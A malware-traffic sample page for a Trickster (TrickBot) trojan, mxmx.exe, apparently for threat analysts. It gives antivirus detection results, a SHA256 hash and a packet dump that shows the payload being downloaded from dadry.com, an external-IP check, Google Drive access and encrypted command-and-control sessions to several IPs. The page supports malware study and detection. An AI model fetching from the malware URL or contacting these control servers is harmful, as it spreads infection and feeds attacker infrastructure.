Trickster Google Drive Malware Trojan PCAP file download traffic sample mxmx.exe

Download Attachments

  • 1 pcap mxmx
    Date added: December 16, 2016 7:18 am Added by: admin File size: 42 KB Downloads: 111
SHA256: 2b4d4eecea94a8d9020cdc1b739a4351ce80cc62a8d2ac2840917f6185c25bfc
File name: mxmx.exe
Detection ratio: 33 / 56
Analysis date: 2016-12-16 07:13:51 UTC ( 0 minutes ago )
Antivirus Result Update
AVG Generic_vb.NXE 20161215
AVware Trojan.Win32.Generic.pak!cobra 20161216
Ad-Aware Trojan.GenericKD.3881958 20161216
AegisLab Ransom.Hpcerber.Smj!c 20161215
AhnLab-V3 Trojan/Win32.Trickster.C1705114 20161215
Antiy-AVL Trojan/Win32.Trickster 20161216
Arcabit Trojan.Generic.D3B3BE6 20161216
Avast Win32:Malware-gen 20161216
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9927 20161207
BitDefender Trojan.GenericKD.3881958 20161216
Bkav HW32.Packed.1C08 20161215
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20161024
ESET-NOD32 Win32/TrickBot.A 20161216
Emsisoft Trojan.GenericKD.3881958 (B) 20161216
F-Secure Trojan.GenericKD.3881958 20161216
Fortinet W32/Trickster.BL!tr 20161216
GData Trojan.GenericKD.3881958 20161216
Invincea generic.a

2016-12-16 01:04:39.182180 IP 192.168.1.102.49978 > 31.24.30.241.80: Flags [P.], seq 0:287, ack 1, win 260, length 287: HTTP: GET /tester/mxmx.exe HTTP/1.1
E..GC[@….>…f…..:.PB.W|Ex..P…….GET /tester/mxmx.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: dadry.com
Connection: Keep-Alive

2016-12-16 01:06:26.189922 IP 192.168.1.102.50599 > 75.75.75.75.53: 9753+ A? myexternalip.com. (34)
E..>…….:…fKKKK…5.*;.&…………myexternalip.com…..
2016-12-16 01:06:26.302399 IP 192.168.1.102.49981 > 78.47.139.102.80: Flags [S], seq 3711211882, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4p.@….     …fN/.f.=.P.4.j…… .y?…………..
2016-12-16 01:06:26.437003 IP 192.168.1.102.49981 > 78.47.139.102.80: Flags [.], ack 3657722638, win 256, length 0
E..(p.@……..fN/.f.=.P.4.k..k.P………….
2016-12-16 01:06:26.437482 IP 192.168.1.102.49981 > 78.47.139.102.80: Flags [P.], seq 0:89, ack 1, win 256, length 89: HTTP: GET /raw HTTP/1.1
E…p.@……..fN/.f.=.P.4.k..k.P…….GET /raw HTTP/1.1
User-Agent: Xmaker
Host: myexternalip.com
Connection: Keep-Alive

2016-12-16 01:06:31.770475 IP 192.168.1.102.49985 > 172.217.1.13.443: Flags [S], seq 2896142083, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4<.@…N….f…..A………… ..{…………..
2016-12-16 01:06:31.809601 IP 192.168.1.102.49985 > 172.217.1.13.443: Flags [.], ack 2035296669, win 256, length 0
E..(<.@…N….f…..A……yP).P….Q……..
2016-12-16 01:06:31.809850 IP 192.168.1.102.49985 > 172.217.1.13.443: Flags [P.], seq 0:239, ack 1, win 256, length 239
E…<.@…M….f…..A……yP).P………………}8-nM……..:.4..]eRB..I….4….L…
…..9.8.7.6… …..3.2.1.0……………..E.D.C.B………5./…A.
…..q………accounts.google.com………
………………………     .
.#….. ……………………………….
2016-12-16 01:06:31.836205 IP 192.168.1.102.49985 > 172.217.1.13.443: Flags [.], ack 2861, win 256, length 0
E..(<.@…N….f…..A……yP4.P….6……..
2016-12-16 01:06:31.842916 IP 192.168.1.102.49985 > 172.217.1.13.443: Flags [P.], seq 239:389, ack 3533, win 254, length 150
E…<.@…Mu…f…..A……yP7iP………..F…BA…..K.3j.g…..#…j…..X….b.=…..H.|m.K!Y……….5F0S…………..@…..W…%…..W.N.Oqm.4….Vw.QG+4.?C.s..mv..Qk……0..}&…K.
2016-12-16 01:06:31.872423 IP 192.168.1.102.49985 > 172.217.1.13.443: Flags [P.], seq 389:666, ack 3819, win 253, length 277
E..=<.@…L….f…..A……yP8.P….0………tU.d.?…9.H…2..H.T..7..a……&.Y….a.B.*Ih…………7P.EM…&=d..5W
y…..$….9…….>…zN9gkq.-……:……+..6.L.~.6.._}W*.e1.T.gL…s)..3Pn.’…4.T
..^….K”fmx.G.2ut[….7<..~Y$.{….r9….b….. R{n…$D…;.&…….p…..-Q.[v/….F..iDJ…..4R..C.B.TB.
2016-12-16 01:06:31.926681 IP 192.168.1.102.49985 > 172.217.1.13.443: Flags [P.], seq 666:911, ack 3819, win 253, length 245
E…<.@…M….f…..A……yP8.P….a……..;..f.j.N(.J..<=Apn3…..fz~.K. .d….n….T…..8..fO… ..i.+.2X…..v..7.3.^?j…z…\…N,..5……..  .,f.2.,…n^hK….a0{.q…*l.n..Cq…….Q)     P..A.G=.].a…-…uF.]zFA!…’………4._0..w|….Cf…J4.D3……?.CS…      ….{!          .i.@i.F
2016-12-16 01:06:31.983148 IP 192.168.1.102.49985 > 172.217.1.13.443: Flags [.], ack 4853, win 256, length 0
E..(<.@…N….f…..A……yP<.P…t………
2016-12-16 01:06:31.988107 IP 192.168.1.102.49985 > 172.217.1.13.443: Flags [F.], seq 911, ack 4853, win 256, length 0
E..(<.@…N….f…..A……yP<.P…t………
2016-12-16 01:06:31.994276 IP 192.168.1.102.49166 > 75.75.75.75.53: 11282+ A? drive.google.com. (34)
E..>…….7…fKKKK…5.*..,…………drive.google.com…..
2016-12-16 01:06:32.005816 IP 192.168.1.102.49985 > 172.217.1.13.443: Flags [.], ack 4854, win 256, length 0
E..(<.@…N….f…..A……yP<.P…t………
2016-12-16 01:06:32.014438 IP 192.168.1.102.49986 > 172.217.2.206.443: Flags [S], seq 1126792056, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4).@…_r…f…..B..C){x…… .Y……………
2016-12-16 01:06:32.048427 IP 192.168.1.102.49986 > 172.217.2.206.443: Flags [.], ack 4136303932, win 256, length 0
E..().@…_}…f…..B..C){y…<P………….
2016-12-16 01:06:32.048560 IP 192.168.1.102.49986 > 172.217.2.206.443: Flags [P.], seq 0:236, ack 1, win 256, length 236
E…).@…^….f…..B..C){y…<P………………DSn.S…W………W…..W1…D0…L…
…..9.8.7.6… …..3.2.1.0……………..E.D.C.B………5./…A.
…..n………drive.google.com………
………………………     .
.#….. ……………………………….

2016-12-16 01:08:18.321929 IP 192.168.1.102.50001 > 207.35.75.110.443: Flags [S], seq 3971241777, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4$.@….I…f.#Kn.Q….W1…… .i}…………..
2016-12-16 01:08:18.535114 IP 192.168.1.102.50001 > 207.35.75.110.443: Flags [.], ack 3822376087, win 256, length 0
E..($.@….T…f.#Kn.Q….W2….P………….
2016-12-16 01:08:18.535840 IP 192.168.1.102.50001 > 207.35.75.110.443: Flags [P.], seq 0:77, ack 1, win 256, length 77
E..u$.@……..f.#Kn.Q….W2….P….v……H…D..XS…………….4…D..X….9………
.       .d.b………c………
2016-12-16 01:08:18.746672 IP 192.168.1.102.50001 > 207.35.75.110.443: Flags [P.], seq 77:267, ack 698, win 253, length 190
E…$.@……..f.#Kn.Q….W….PP………………..g0k..j..a;..3.9…e…..}Q.!..
….o.$…or4.B..nx9….}.. ..,.O.=…Xk.~.N[..o(U….u1..V6.)#..$..*……………2w..H5Z..z………..(………(ak..^.}..3…\v..,….MF.NJ…
2016-12-16 01:08:18.943352 IP 192.168.1.102.50001 > 207.35.75.110.443: Flags [P.], seq 267:477, ack 749, win 253, length 210
E…$.@……..f.#Kn.Q….X=….P…N……..q.^…K.Ya..U..Ee….S……..Y…..%.a.!i……….N….y../g….Zk…>).9cL……….5…j.}…C\}………V..q…….dC/.U….1…6H.!`……t..w,W….r.~g.`”_..L.zW.i..8…..O.Tre.. .y…..ui..:.2O..Rb
2016-12-16 01:08:19.179437 IP 192.168.1.102.50001 > 207.35.75.110.443: Flags [P.], seq 477:815, ack 1146, win 252, length 338
E..z$.@……..f.#Kn.Q….Y…..P….C………?:.t.@:..u……I..9……0b..G.E9o[….%…Z..M\…….).DDk.w8..P.ZWf….S<*…287.p…8t..8.C..`…w.[=……….B..Uq………1O.2.C…………,.!  …..C!…..v.W……..IYg…&..O……..?4.x`=Q……OT.5w…F.q._S.D….]..IR…..5.1..M..3..t4…\.a1..I.3f….$….?…O……:.S…$6..\.uM.*……._\2.6S………1.RH#.O…)
2016-12-16 01:08:19.474028 IP 192.168.1.102.50002 > 201.236.219.180.447: Flags [S], seq 3636186194, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4@.@…S….f…..R…..R…… .}@…………..
2016-12-16 01:08:19.490580 IP 192.168.1.102.50001 > 207.35.75.110.443: Flags [.], ack 1719, win 256, length 0
E..($.@….O…f.#Kn.Q….Za…MP………….
2016-12-16 01:08:19.776805 IP 192.168.1.102.50002 > 201.236.219.180.447: Flags [.], ack 781100689, win 258, length 0
E..(@.@…S….f…..R…..S….P………….
2016-12-16 01:08:19.777727 IP 192.168.1.102.50002 > 201.236.219.180.447: Flags [P.], seq 0:77, ack 1, win 258, length 77
E..u@.@…R….f…..R…..S….P………..H…D..XS…Sq…..X.Qx)L….s.O..e…j……..
.       .d.b………c………
2016-12-16 01:08:20.088105 IP 192.168.1.102.50002 > 201.236.219.180.447: Flags [P.], seq 77:391, ack 835, win 255, length 314
E..b@.@…Q….f…..R……….P……………….,……l…..y.b..fg.@zO…X5…HJO&.6.m….d…O…0..$F…V..H\..j.b1.o.J.4….T..0d.I.E.j.$M3.0..1$.,.”.]uQ..%=..”.Y$….Z.+H…l….3.b,..7aT…..]……l1.<6….l…M.W/…S”..v.*-………b..Q.d.-8E..6mf.5….oG.Cu.._G..t…5.L…….=3.Cg,…….e`……….$W…..w].)..B………o._6s.Cgg.W…
2016-12-16 01:08:20.407595 IP 192.168.1.102.50002 > 201.236.219.180.447: Flags [P.], seq 391:582, ack 882, win 255, length 191
E…@.@…RK…f…..R……….P…@…………<……….IZ…lp…,2d.}.7….{so1T.:…O……[..c.I..a..!.+>………CZ.a..Hnc….BWj.:FMJ.*x….(…..?.u”.(…87.-.DR..$u.;….yHe..5[.!.h3…   i^r.[~..)w.|.&….H..@.<:…^.D..
2016-12-16 01:08:20.712334 IP 192.168.1.102.50002 > 201.236.219.180.447: Flags [.], ack 3762, win 258, length 0
E..(@.@…S     …f…..R………BP………….
2016-12-16 01:08:20.713670 IP 192.168.1.102.50002 > 201.236.219.180.447: Flags [.], ack 6642, win 258, length 0
E..(@.@…S….f…..R……….P………….
2016-12-16 01:08:20.714528 IP 192.168.1.102.50002 > 201.236.219.180.447: Flags [.], ack 9522, win 258, length 0
E..(@.@…S….f…..R……….P….j……..
2016-12-16 01:08:20.715310 IP 192.168.1.102.50002 > 201.236.219.180.447: Flags [.], ack 12402, win 258, length 0
:2016-12-16 01:08:21.015415 IP 192.168.1.102.50002 > 201.236.219.180.447: Flags [.], ack 22355, win 258, length 0
E..(@.@…S….f…..R……….P….I……..
2016-12-16 01:08:27.125778 IP 192.168.1.102.49834 > 104.244.74.13.443: Flags [.], ack 2261342136, win 2658, length 0
E..(w.@……..fh.J…..^…..W.P.
b……….
2016-12-16 01:08:53.303862 IP 192.168.1.102.49833 > 91.121.230.214.443: Flags [.], ack 3390770720, win 952, length 0
E..(p.@……..f[y……..P%… P………….
2016-12-16 01:09:24.442620 IP 192.168.1.102.50001 > 207.35.75.110.443: Flags [.], ack 1749, win 256, length 0
E..($.@….N…f.#Kn.Q….Za…kP………….
2016-12-16 01:09:26.012623 IP 192.168.1.102.50002 > 201.236.219.180.447: Flags [.], ack 22383, win 258, length 0
E..(@.@…S….f…..R……….P….-……..
2016-12-16 01:09:26.632805 IP 192.168.1.102.50002 > 201.236.219.180.447: Flags [F.], seq 582, ack 22383, win 258, length 0
E..(@ @…S….f…..R……….P….,……..
2016-12-16 01:09:26.633149 IP 192.168.1.102.50001 > 207.35.75.110.443: Flags [F.], seq 815, ack 1749, win 256, length 0
E..($.@….M…f.#Kn.Q….Za…kP………….

One Comment on “Trickster Google Drive Malware Trojan PCAP file download traffic sample mxmx.exe”

Leave a Reply